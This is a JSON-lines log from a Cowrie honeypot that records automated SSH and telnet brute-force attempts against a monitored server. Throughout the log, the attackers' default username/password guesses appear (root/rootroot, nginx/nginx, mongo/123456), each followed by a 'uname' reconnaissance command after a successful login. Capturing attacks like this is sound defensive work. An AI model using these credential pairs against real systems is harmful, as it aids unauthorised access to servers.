{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:18:14.805606Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:18:15.086330Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.087098Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:18:15.175363Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.176044Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.193348Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.194366Z","src_ip":"212.227.125.160","session":"7899fed461a1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.213335Z","src_ip":"212.227.125.160","session":"71c1eecf24d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.321736Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:15.322883Z","src_ip":"212.227.235.229","session":"4cf796dd28ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45898,"dst_ip":"1.2.3.4","dst_port":22,"session":"a32679a51da7","protocol":"ssh","message":"New connection: 212.227.235.229:45898 (1.2.3.4:22) [session: a32679a51da7]","sensor":"my-vps","timestamp":"2025-08-28T06:18:19.720313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:19.721184Z","src_ip":"212.227.235.229","session":"a32679a51da7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:19.974013Z","src_ip":"212.227.235.229","session":"a32679a51da7"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:20.734557Z","src_ip":"212.227.235.229","session":"a32679a51da7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43896,"dst_ip":"1.2.3.4","dst_port":22,"session":"c661f320ddc2","protocol":"ssh","message":"New connection: 212.227.125.160:43896 (1.2.3.4:22) [session: c661f320ddc2]","sensor":"my-vps","timestamp":"2025-08-28T06:18:21.651229Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:21.672061Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:21.765037Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:21.988559Z","src_ip":"212.227.235.229","session":"a32679a51da7"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:18:22.169570Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:18:22.418974Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:18:22.419693Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:22.533411Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:22.534546Z","src_ip":"212.227.125.160","session":"c661f320ddc2"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46454,"dst_ip":"1.2.3.4","dst_port":23,"session":"a424beae1144","protocol":"telnet","message":"New connection: 8.222.212.69:46454 (1.2.3.4:23) [session: a424beae1144]","sensor":"my-vps","timestamp":"2025-08-28T06:18:25.646604Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":46456,"dst_ip":"1.2.3.4","dst_port":23,"session":"f642d5a778f1","protocol":"telnet","message":"New connection: 8.222.212.69:46456 (1.2.3.4:23) [session: f642d5a778f1]","sensor":"my-vps","timestamp":"2025-08-28T06:18:26.999961Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49754,"dst_ip":"1.2.3.4","dst_port":22,"session":"311d047f81f6","protocol":"ssh","message":"New connection: 212.227.125.160:49754 (1.2.3.4:22) [session: 311d047f81f6]","sensor":"my-vps","timestamp":"2025-08-28T06:18:29.526413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:29.527300Z","src_ip":"212.227.125.160","session":"311d047f81f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:29.751009Z","src_ip":"212.227.125.160","session":"311d047f81f6"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:30.421134Z","src_ip":"212.227.125.160","session":"311d047f81f6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:31.645625Z","src_ip":"212.227.125.160","session":"311d047f81f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37420,"dst_ip":"1.2.3.4","dst_port":22,"session":"154ce2e65534","protocol":"ssh","message":"New connection: 212.227.235.229:37420 (1.2.3.4:22) [session: 154ce2e65534]","sensor":"my-vps","timestamp":"2025-08-28T06:18:36.013368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:36.014464Z","src_ip":"212.227.235.229","session":"154ce2e65534"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:36.267422Z","src_ip":"212.227.235.229","session":"154ce2e65534"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:37.026828Z","src_ip":"212.227.235.229","session":"154ce2e65534"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33478,"dst_ip":"1.2.3.4","dst_port":22,"session":"64b6894e1c3e","protocol":"ssh","message":"New connection: 212.227.125.160:33478 (1.2.3.4:22) [session: 64b6894e1c3e]","sensor":"my-vps","timestamp":"2025-08-28T06:18:37.805289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:37.806268Z","src_ip":"212.227.125.160","session":"64b6894e1c3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:37.975812Z","src_ip":"212.227.125.160","session":"64b6894e1c3e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:38.280164Z","src_ip":"212.227.235.229","session":"154ce2e65534"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:38.562401Z","src_ip":"212.227.125.160","session":"64b6894e1c3e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:39.667617Z","src_ip":"212.227.125.160","session":"64b6894e1c3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34680,"dst_ip":"1.2.3.4","dst_port":22,"session":"80a5abd04715","protocol":"ssh","message":"New connection: 212.227.235.229:34680 (1.2.3.4:22) [session: 80a5abd04715]","sensor":"my-vps","timestamp":"2025-08-28T06:18:44.338906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:44.340172Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:44.485215Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:18:44.922380Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:18:45.333895Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.334611Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.481184Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.482419Z","src_ip":"212.227.235.229","session":"80a5abd04715"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55316,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1454760dca1","protocol":"ssh","message":"New connection: 212.227.125.160:55316 (1.2.3.4:22) [session: e1454760dca1]","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.765005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.766337Z","src_ip":"212.227.125.160","session":"e1454760dca1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:45.990150Z","src_ip":"212.227.125.160","session":"e1454760dca1"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"123456","message":"login attempt [mongo/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:46.850181Z","src_ip":"212.227.125.160","session":"e1454760dca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55580,"dst_ip":"1.2.3.4","dst_port":22,"session":"eadfb698b5fa","protocol":"ssh","message":"New connection: 212.227.235.229:55580 (1.2.3.4:22) [session: eadfb698b5fa]","sensor":"my-vps","timestamp":"2025-08-28T06:18:47.280607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:47.281710Z","src_ip":"212.227.235.229","session":"eadfb698b5fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:18:47.425971Z","src_ip":"212.227.235.229","session":"eadfb698b5fa"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:18:48.048719Z","src_ip":"212.227.235.229","session":"eadfb698b5fa"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:48.067882Z","src_ip":"212.227.125.160","session":"e1454760dca1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:18:49.195718Z","src_ip":"212.227.235.229","session":"eadfb698b5fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58278,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf67297fda99","protocol":"ssh","message":"New connection: 212.227.235.229:58278 (1.2.3.4:22) [session: bf67297fda99]","sensor":"my-vps","timestamp":"2025-08-28T06:18:52.335879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:18:52.337135Z","src_ip":"212.227.235.229","session":"bf67297fda99"}
